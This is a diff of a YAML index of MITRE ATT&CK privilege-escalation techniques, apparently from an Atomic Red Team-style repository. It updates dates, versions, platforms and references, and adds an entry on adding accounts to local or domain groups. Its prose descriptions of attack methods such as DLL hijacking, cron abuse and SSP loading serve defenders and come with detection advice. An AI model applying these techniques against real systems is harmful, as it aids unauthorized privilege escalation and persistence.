       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.002
     atomic_tests: []
   T1543.003:
@@ -16773,31 +17040,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.003
     atomic_tests: []
   T1053.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
-      type: attack-pattern
-      created: '2019-12-03T14:25:00.538Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1053.003
-        url: https://attack.mitre.org/techniques/T1053/003
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T18:45:51.945Z'
       name: 'Scheduled Task/Job: Cron'
       description: "Adversaries may abuse the <code>cron</code> utility to perform
         task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -16814,6 +17061,7 @@ privilege-escalation:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor scheduled task creation from common utilities using
         command-line invocation. Legitimate scheduled tasks may be created during
         installation of new software or through system administration functions. Look
@@ -16824,9 +17072,13 @@ privilege-escalation:
         part of a chain of behavior that could lead to other activities, such as network
         connections made for Command and Control, learning details about the environment
         through Discovery, and Lateral Movement. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -16834,13 +17086,29 @@ privilege-escalation:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+      created: '2019-12-03T14:25:00.538Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1053/003
+        external_id: T1053.003
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1053.003
     atomic_tests: []
   T1098.003:
     technique:
-      modified: '2024-03-29T18:29:06.873Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Roles'
       description: "An adversary may add additional roles or permissions to an adversary-controlled
         cloud account to maintain persistent access to a tenant. For example, adversaries
@@ -16870,6 +17138,7 @@ privilege-escalation:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Alex Parsons, Crowdstrike
@@ -16880,6 +17149,7 @@ privilege-escalation:
       - Praetorian
       - Alex Soler, AttackIQ
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
         accounts to identify unusual activity in the assignment of roles to those
@@ -16888,13 +17158,13 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - IaaS
       - SaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -16936,9 +17206,6 @@ privilege-escalation:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.003
     atomic_tests: []
   T1547.012:
@@ -17006,19 +17273,18 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.012
     atomic_tests: []
   T1574.001:
     technique:
-      modified: '2024-04-18T22:54:54.668Z'
+      modified: '2024-09-30T17:32:59.948Z'
       name: 'Hijack Execution Flow: DLL Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
 
         There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
 
-        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
 
         Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
 
@@ -17034,8 +17300,8 @@ privilege-escalation:
       - Travis Smith, Tripwire
       - Stefan Kanthak
       - Marina Liang
-      - Will Alexander
-      - Ami Holeston
+      - Ami Holeston, CrowdStrike
+      - Will Alexander, CrowdStrike
       x_mitre_deprecated: false
       x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
         modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -17049,7 +17315,7 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -17075,6 +17341,10 @@ privilege-escalation:
         description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
           17, 2020.
         url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+      - source_name: Hexacorn DLL Hijacking
+        description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+          Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
       - source_name: Microsoft Security Advisory 2269637
         description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
           March 13, 2020.
@@ -17102,12 +17372,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1574.001
     atomic_tests: []
   T1574.014:
     technique:
-      modified: '2024-04-18T15:03:32.158Z'
+      modified: '2024-04-28T15:44:25.342Z'
       name: AppDomainManager
       description: "Adversaries may execute their own malicious payloads by hijacking
         how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -17133,7 +17402,7 @@ privilege-escalation:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Thomas B
-      - Ivy Bostock
+      - Ivy Drexel
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -17175,7 +17444,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1098.006:
     technique:
@@ -17253,11 +17521,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053:
     technique:
-      modified: '2024-03-01T15:29:46.832Z'
+      modified: '2024-10-15T15:14:03.453Z'
       name: Scheduled Task/Job
       description: |-
         Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -17337,7 +17604,77 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
+    atomic_tests: []
+  T1098.007:
+    technique:
+      modified: '2024-10-14T14:32:08.926Z'
+      name: Additional Local or Domain Groups
+      description: "An adversary may add additional local or domain groups to an adversary-controlled
+        account to maintain persistent access to a system or domain.\n\nOn Windows,
+        accounts may use the `net localgroup` and `net group` commands to add existing
+        users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+        Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+        the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+        added to the local administrators group on Windows devices to maintain elevated
+        privileges. They may also be added to the Remote Desktop Users group, which
+        allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+        to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+        Linux, accounts may be added to the sudoers group, allowing them to persistently
+        leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+        for elevated privileges. \n\nIn Windows environments, machine accounts may
+        also be added to domain groups. This allows the local SYSTEM account to gain
+        privileges on the domain.(Citation: RootDSE AD Detection 2022)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'User Account: User Account Modification'
+      type: attack-pattern
+      id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+      created: '2024-08-05T20:49:49.809Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1098/007
+        external_id: T1098.007
+      - source_name: Linux Usermod
+        description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+        url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+      - source_name: Microsoft Net Group
+        description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+          2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+      - source_name: Microsoft Net Localgroup
+        description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+          5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+      - source_name: Microsoft RDP Logons
+        description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+          Services. Retrieved August 5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+      - source_name: RootDSE AD Detection 2022
+        description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+          Active Directory environments. Retrieved August 5, 2024.
+        url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.003:
     technique:
@@ -17360,7 +17697,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:22:50.800Z'
       name: Thread Execution Hijacking
       description: "Adversaries may inject malicious code into hijacked processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -17408,8 +17745,6 @@ privilege-escalation:
       - Anti-virus
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.003
     atomic_tests: []
   T1546.011:
@@ -17441,7 +17776,7 @@ privilege-escalation:
         description: Pierce, Sean. (2015, November). Defending Against Malicious Application
           Compatibility Shims. Retrieved June 22, 2017.
         source_name: Black Hat 2015 App Shim
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.094Z'
       name: 'Event Triggered Execution: Application Shimming'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by application shims. The Microsoft
@@ -17496,13 +17831,11 @@ privilege-escalation:
       - 'Process: Process Creation'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.011
     atomic_tests: []
   T1547.010:
     technique:
-      modified: '2024-04-12T02:49:39.980Z'
+      modified: '2024-09-12T15:26:17.886Z'
       name: 'Boot or Logon Autostart Execution: Port Monitors'
       description: "Adversaries may use port monitors to run an adversary supplied
         DLL during system boot for persistence or privilege escalation. A port monitor
@@ -17563,9 +17896,9 @@ privilege-escalation:
           slides&#93;. Retrieved November 12, 2014.
         url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
       - source_name: AddMonitor
-        description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
-          2014.
-        url: http://msdn.microsoft.com/en-us/library/dd183341
+        description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -17574,7 +17907,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.010
     atomic_tests: []
   T1037.002:
@@ -17627,7 +17959,7 @@ privilege-escalation:
         Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
         version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
         and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:42:05.094Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
       x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -17648,12 +17980,11 @@ privilege-escalation:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.002
     atomic_tests: []
   T1055:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:45.488Z'
       name: Process Injection
       description: "Adversaries may inject code into processes in order to evade process-based
         defenses as well as possibly elevate privileges. Process injection is a method
@@ -17756,7 +18087,6 @@ privilege-escalation:
         url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1055
     atomic_tests: []
   T1611:
@@ -17856,12 +18186,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1611
     atomic_tests: []
   T1547.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T13:41:16.110Z'
       name: 'Boot or Logon Autostart Execution: Shortcut Modification'
       description: |-
         Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -17874,7 +18203,6 @@ privilege-escalation:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - David French, Elastic
       - Bobby, Filar, Elastic
@@ -17887,7 +18215,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.2'
@@ -17917,7 +18244,8 @@ privilege-escalation:
         url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1547.009
     atomic_tests: []
   T1547.005:
@@ -17944,7 +18272,7 @@ privilege-escalation:
         description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
           Retrieved June 24, 2015.
         source_name: Microsoft Configure LSA
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T15:42:48.910Z'
       name: 'Boot or Logon Autostart Execution: Security Support Provider'
       description: |-
         Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -17970,13 +18298,11 @@ privilege-escalation:
       - 'Windows Registry: Windows Registry Key Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.005
     atomic_tests: []
   T1543.004:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:48.453Z'
       name: 'Create or Modify System Process: Launch Daemon'
       description: |-
         Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in <code>/System/Library/LaunchDaemons/</code> and <code>/Library/LaunchDaemons/</code>. Required Launch Daemons parameters include a <code>Label</code> to identify the task, <code>Program</code> to provide a path to the executable, and <code>RunAtLoad</code> to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -18053,12 +18379,11 @@ privilege-escalation:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1543.004
     atomic_tests: []
   T1574.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:25:57.059Z'
       name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -18077,6 +18402,7 @@ privilege-escalation:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Stefan Kanthak
+      x_mitre_deprecated: false
       x_mitre_detection: |
         Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
 
@@ -18084,7 +18410,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -18104,34 +18429,36 @@ privilege-escalation:
       id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
       created: '2020-03-13T17:48:58.999Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1574/008
         external_id: T1574.008
+      - source_name: Microsoft Environment Property
+        description: Microsoft. (2011, October 24). Environment Property. Retrieved
+          July 27, 2016.
+        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+      - source_name: Microsoft WinExec
+        description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
       - source_name: Windows NT Command Shell
         description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
           December 5, 2014.
         url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
-      - source_name: Microsoft WinExec
-        description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms687393
-      - source_name: Microsoft Environment Property
-        description: Microsoft. (2011, October 24). Environment Property. Retrieved
-          July 27, 2016.
-        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.008
     atomic_tests: []
   T1484.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-23T22:11:01.884Z'
       name: 'Domain Policy Modification: Group Policy Modification'
       description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
         the intended discretionary access controls for a domain, usually with the
@@ -18167,6 +18494,10 @@ privilege-escalation:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Itamar Mizrahi, Cymptom
+      - Tristan Bennett, Seamless Intelligence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
 
@@ -18178,16 +18509,12 @@ privilege-escalation:
 
 
         GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
-      x_mitre_platforms:
-      - Windows
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
       x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Itamar Mizrahi, Cymptom
-      - Tristan Bennett, Seamless Intelligence
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Active Directory: Active Directory Object Creation'
@@ -18223,12 +18550,12 @@ privilege-escalation:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Harmj0y SeEnableDelegationPrivilege Right
         description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
-          You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
-        url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+          You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
       - source_name: TechNet Group Policy Basics
         description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
           Understanding the Structure of a Group Policy Object. Retrieved March 5,
@@ -18236,14 +18563,13 @@ privilege-escalation:
         url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.001
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -18258,6 +18584,7 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -18266,18 +18593,18 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
